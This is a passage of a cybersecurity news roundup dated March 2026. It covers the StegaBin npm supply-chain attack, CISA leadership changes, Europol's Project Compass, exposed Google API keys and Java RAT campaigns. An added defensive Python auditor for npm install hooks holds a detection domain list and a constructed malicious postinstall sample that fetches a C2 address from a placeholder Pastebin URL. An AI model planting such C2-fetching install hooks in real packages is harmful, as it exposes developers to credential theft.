AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

InfoSec News Nuggets 03/03/2026

CISA Replaces Acting Director After a Bumbling Year on the Job

The Trump administration has ousted Madhu Gottumukkala as acting director of the Cybersecurity and Infrastructure Security Agency, replacing him with Nick Andersen, the agency’s former top cybersecurity official, after a turbulent tenure marked by reports of Gottumukkala uploading sensitive government documents to a public version of ChatGPT, failing a counterintelligence polygraph, and presiding over the departure of at least one-third of the agency’s workforce through buyouts and early retirements. The shakeup also claimed the agency’s Chief Information Officer Bob Costello and acting Chief Human Capital Officer Kevin Diana, both of whom were reassigned or shown the door. Andersen — a veteran of cybersecurity leadership roles at the Coast Guard, Navy, and Department of Energy — received an unusually warm welcome from CISA staff, with multiple employees describing his appointment as the best news the agency had received in over a year; the agency still lacks a Senate-confirmed permanent director, with nominee Sean Plankey’s confirmation stalled pending release of a report on Salt Typhoon telecommunications vulnerabilities.

North Korean Hackers Publish 26 npm Packages Hiding Pastebin C2 for Cross-Platform RAT

Researchers at Socket have uncovered a sophisticated North Korean supply chain attack dubbed “StegaBin,” in which the Famous Chollima threat cluster — linked to Lazarus Group — published 26 malicious npm packages between February 25–26 that impersonate popular developer libraries including Express, Fastify, lodash, and others, each designed to trigger a hidden install script that decodes command-and-control addresses steganographically concealed inside seemingly innocent computer science essays on Pastebin, then fetches platform-specific payloads routing through 31 Vercel deployments. Once installed, the malware deploys a nine-module infostealer toolkit purpose-built for developer workstations, targeting VSCode configurations (with a 186-space whitespace persistence trick), SSH keys, Git repositories, browser credential stores, cryptocurrency wallet extensions, clipboard data, and secrets via a weaponized TruffleHog scanner — all exfiltrated over a live C2 at 103[.]106[.]67[.]63. All 26 packages have been removed from the npm registry, but organizations are advised to audit dependencies and monitor for unusual outbound connections to Pastebin and Vercel endpoints.
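The advisory's own remediation advice is to audit dependencies for hidden install scripts and to watch for unexpected reaches to Pastebin and Vercel. As an added example (not code from the original post, and not Socket's tooling), the Python below inspects a package's manifest for npm lifecycle hooks and, where a hook runs a local script, reads that script too, flagging any reference to the domains the advisory names. The two sample packages, their file contents, and the domain list are constructed for the demo.

```python
"""Added example: audit an npm package for lifecycle install hooks that reach
out to the paste/hosting domains named in the StegaBin advisory.
Not Socket's code; sample packages below are constructed."""
import json
import re
from typing import Dict, List

# Lifecycle hooks npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Domains the advisory describes as C2 lookup / payload staging.
# Constructed list for the demo; a real deployment would extend it.
SUSPICIOUS_DOMAINS = ("pastebin.com", "vercel.app")

URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)
# Local script files a hook command may invoke, e.g. "node ./setup.js".
LOCAL_JS_RE = re.compile(r"\b([\w./-]+\.(?:js|mjs|cjs))\b")


def _suspicious_hosts(text: str) -> List[str]:
    """Hosts in `text` that are (or are subdomains of) a suspicious domain."""
    hosts = {h.lower() for h in URL_HOST_RE.findall(text)}
    return sorted(h for h in hosts
                  if any(h == d or h.endswith("." + d) for d in SUSPICIOUS_DOMAINS))


def audit_package(package_json: str, files: Dict[str, str]) -> List[Dict[str, str]]:
    """Return one finding per install hook declared in the manifest.

    package_json: raw text of the package's package.json.
    files: package-relative file name -> content, so that local scripts the
           hook invokes can be inspected as well (hypothetical in-memory tree).
    """
    manifest = json.loads(package_json)
    name = manifest.get("name", "<unnamed>")
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        # Look at the command itself plus any local script it runs.
        text = cmd
        for ref in LOCAL_JS_RE.findall(cmd):
            text += "\n" + files.get(ref.lstrip("./"), "")
        hosts = _suspicious_hosts(text)
        findings.append({
            "package": name,
            "hook": hook,
            # Any install hook deserves a look; a suspicious host makes it "high".
            "severity": "high" if hosts else "review",
            "hosts": ",".join(hosts),
            "command": cmd,
        })
    return findings


# Constructed sample: a look-alike package whose postinstall helper pulls its
# C2 address from a Pastebin paste (EXAMPLEID is a placeholder, not a real paste).
LOOKALIKE_MANIFEST = json.dumps({
    "name": "lodash-utilz",
    "version": "4.17.21",
    "scripts": {"postinstall": "node ./setup.js"},
})
LOOKALIKE_FILES = {
    "setup.js": "const u = 'https://pastebin.com/raw/EXAMPLEID';\n"
                "fetch(u).then(r => r.text()).then(decodeC2);\n",
}

# Constructed sample: a benign package that only compiles itself on install.
BENIGN_MANIFEST = json.dumps({
    "name": "my-internal-lib",
    "version": "1.0.0",
    "scripts": {"prepare": "tsc -p .", "test": "jest"},
})


def demo() -> List[Dict[str, str]]:
    """Run the audit over both constructed samples."""
    return audit_package(LOOKALIKE_MANIFEST, LOOKALIKE_FILES) + audit_package(BENIGN_MANIFEST, {})


if __name__ == "__main__":
    for f in demo():
        print(f"[{f['severity']}] {f['package']} {f['hook']}: {f['command']} {f['hosts']}")
```

In practice you would walk `node_modules` and feed each package's `package.json` and sibling files to `audit_package`; even a "review" finding on a package that impersonates a well-known library is worth a second look, and `npm install --ignore-scripts` stops lifecycle hooks from running at all while you investigate.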

Project Compass Is Europol’s New Playbook for Taking on ‘The Com’

Europol has announced the first operational results of Project Compass, a yearlong joint initiative coordinated by its European Counter Terrorism Centre with participation from 28 countries — including all Five Eyes nations — targeting The Com, a sprawling decentralized network of primarily English-speaking cybercriminals aged 13 to 25 responsible for ransomware attacks on UK retailers Marks & Spencer, Co-op, and Harrods, the 2023 Las Vegas casino breaches, and the coercion of minors into producing child sexual exploitation material. Since launching in January 2025, the operation has resulted in 30 arrests, the full or partial identification of 179 additional perpetrators, and the safeguarding of four victims; among those arrested are two alleged leaders of the Com sub-network 764, Leonidas Varagiannis and Prasan Nepal, who face life in prison for directing an international child exploitation ring. Europol framed Project Compass as an intelligence-sharing architecture rather than a one-time bust, emphasizing that the initiative will continue building joint investigative capacity across counter-terrorism, CSAM, and organized crime units as The Com’s tactics evolve.

Thousands of Public Google Cloud API Keys Exposed with Gemini Access After Silent API Enablement

Security researchers at Truffle Security disclosed that Google’s single API key format — the AIza… string Google has explicitly instructed developers to embed in public client-side code for over a decade — silently gains authentication access to sensitive Gemini AI endpoints whenever the Generative Language API is enabled on a Google Cloud project, with no warning, no confirmation dialog, and no email notification to the developer. A scan of the November 2025 Common Crawl dataset identified 2,863 live exposed keys belonging to major financial institutions, security companies, global recruiting firms, and Google itself; any attacker can extract one from a webpage’s source code and immediately access private uploaded files, cached AI context, and billable inference services — or generate thousands of dollars in daily charges against the victim’s account. Google has begun blocking known-exposed keys and committed to scoped defaults for new AI Studio keys going forward, but the root-cause architectural fix was still in progress when Truffle published after the 90-day disclosure window expired, and organizations are urged to audit all GCP projects immediately for the Generative Language API and rotate any publicly accessible keys.

Trojanized Gaming Tools Spread Java-Based RAT via Browser and Chat Platforms

Microsoft Threat Intelligence has flagged an active campaign distributing a multi-purpose Java-based remote access trojan through malicious gaming utilities spread via browsers and messaging platforms, with the attack chain staging a portable Java runtime, executing a malicious JAR file named jd-gui.jar, and leveraging PowerShell alongside living-off-the-land binaries like cmstp.exe for stealthy execution while simultaneously deleting the initial downloader and configuring Microsoft Defender exclusions to evade detection. Persistence is achieved via a scheduled task and a Windows startup script named world.vbs, with the final payload capable of functioning as a loader, runner, downloader, and full RAT. The campaign was disclosed alongside separate findings from BlackFog on a new Windows RAT called Steaelite — sold on criminal forums since November 2025 as fully undetectable — which bundles data theft and ransomware into a single web panel with keylogging, clipboard monitoring, UAC bypass, and an Android ransomware module reportedly in development.
